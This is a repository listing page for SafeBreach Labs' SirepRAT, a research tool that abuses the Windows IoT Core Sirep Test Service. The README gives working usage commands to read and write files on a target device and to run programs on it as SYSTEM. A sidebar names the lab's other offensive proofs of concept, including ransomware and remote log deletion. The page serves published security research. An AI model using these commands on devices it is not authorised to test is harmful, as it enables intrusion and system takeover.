SafeBreach-Labs/SirepRAT SafeBreach-Labs/SirepRAT

  • Stars
    star
    366
  • Rank 114,145 (Top 3 %)
  • Language
    Python
  • License
    BSD 3-Clause "New...
  • Created over 5 years ago
  • Updated over 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
SafeBreach-Labs/SirepRAT
github

SafeBreach-Labs

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Remote Command Execution as SYSTEM on Windows IoT Core (releases available for Python2.7 & Python3)

SirepRAT

SirepRAT - RCE as SYSTEM on Windows IoT Core

SirepRAT Features full RAT capabilities without the need of writing a real RAT malware on target.

Context

The method is exploiting the Sirep Test Service thatโ€™s built in and running on the official images offered at Microsoftโ€™s site. This service is the client part of the HLK setup one may build in order to perform driver/hardware tests on the IoT device. It serves the Sirep/WPCon/TShell protocol.

We broke down the Sirep/WPCon protocol and demonstrated how this protocol exposes a remote command interface for attackers, that include RAT abilities such as get/put arbitrary files on arbitrary locations and obtain system information.

Based on the findings we have extracted from this research about the service and protocol, we built a simple python tool that allows exploiting them using the different supported commands. We called it SirepRAT.

It features an easy and intuitive user interface for sending commands to a Windows IoT Core target. It works on any cable-connected device running Windows IoT Core with an official Microsoft image.

Slides and White Paper

Slides and research White Paper are in the docs folder

Setup

pip install -r requirements.txt

Usage

Download File

python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

Upload File

python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

Run Arbitrary Program

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

With arguments, impersonated as the currently logged on user:

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(Try to run it without the as_logged_on_user flag to demonstrate the SYSTEM execution capability)

Get System Information

python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

Get File Information

python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

See help for full details:

python SirepRAT.py --help

Author

Dor Azouri (@bemikre)

Contributors

movatica (@movatica) - porting to python 3! (at the finish line of 2020)

License

BSD 3 - clause "New" or "Revised" License

More Repositories

1

pinjectra

Pinjectra is a C/C++ OOP-like library that implements Process Injection techniques (with focus on Windows 10 64-bit)
C++
761
star
2

EDRaser

EDRaser is a powerful tool for remotely deleting access logs, Windows event logs, databases, and other files on remote machines. It offers two modes of operation: automated and manual.
Python
306
star
3

pwndsh

Post-exploitation framework (and an interactive shell) developed in Bash shell scripting
Shell
306
star
4

pacdoor

Proof-of-concept JavaScript malware implemented as a Proxy Auto-Configuration (PAC) File
Python
152
star
5

pyekaboo

Proof-of-concept program that is able to to hijack/hook/proxy Python module(s) thanks to $PYTHONPATH variable
Python
148
star
6

Back2TheFuture

Find patterns of vulnerabilities on Windows in order to find 0-day and write exploits of 1-days. We use Microsoft security updates in order to find the patterns.
C
146
star
7

hAFL2

A kAFL based hypervisor fuzzer which fully supports nested VMs
Python
129
star
8

CloudMiner

Execute code using Azure Automation service without getting charged
Python
127
star
9

wd-pretender

Python
113
star
10

SimpleBITSServer

A simple python implementation of a BITS server.
Python
97
star
11

BITSInject

A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service), allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account
Python
97
star
12

mkmalwarefrom

Proof-of-concept two-stage dropper generator that uses bits from external sources
Python
96
star
13

spacebin

Spacebin is a proof-of-concept malware that exfiltrates data (from No Direct Internet Access environments) via triggering AV on the endpoint and then communicating back from the AV's cloud component.
Python
85
star
14

CortexVortex

Python
68
star
15

backdoros

backdorOS is an in-memory OS written in Python 2.7 with a built-in in-memory filesystem, hooks for open() calls and imports, Python REPL etc.
Python
65
star
16

aikido_wiper

Python
63
star
17

Spooler

C
57
star
18

DoubleDrive

A fully-undetectable ransomware that utilizes OneDrive to encrypt target files
Python
54
star
19

AltFS

The Alternative Fileless File System
Python
54
star
20

RSFW

Request Smuggling Firewall
C++
43
star
21

HRS

Perl
43
star
22

cachetalk

Proof-of-concept program that is able to read and write arbitrary bits using HTTP server-side caching
Python
36
star
23

BACE

Mapping of Binaries that allows Arbitrary Code Execution
24
star
24

CoWTools

Tools for analyzing Windows containers and break container's isolation
C++
21
star
25

blog-snippets

Repository of Code Snippets from various SafeBreach Blog posts
Python
5
star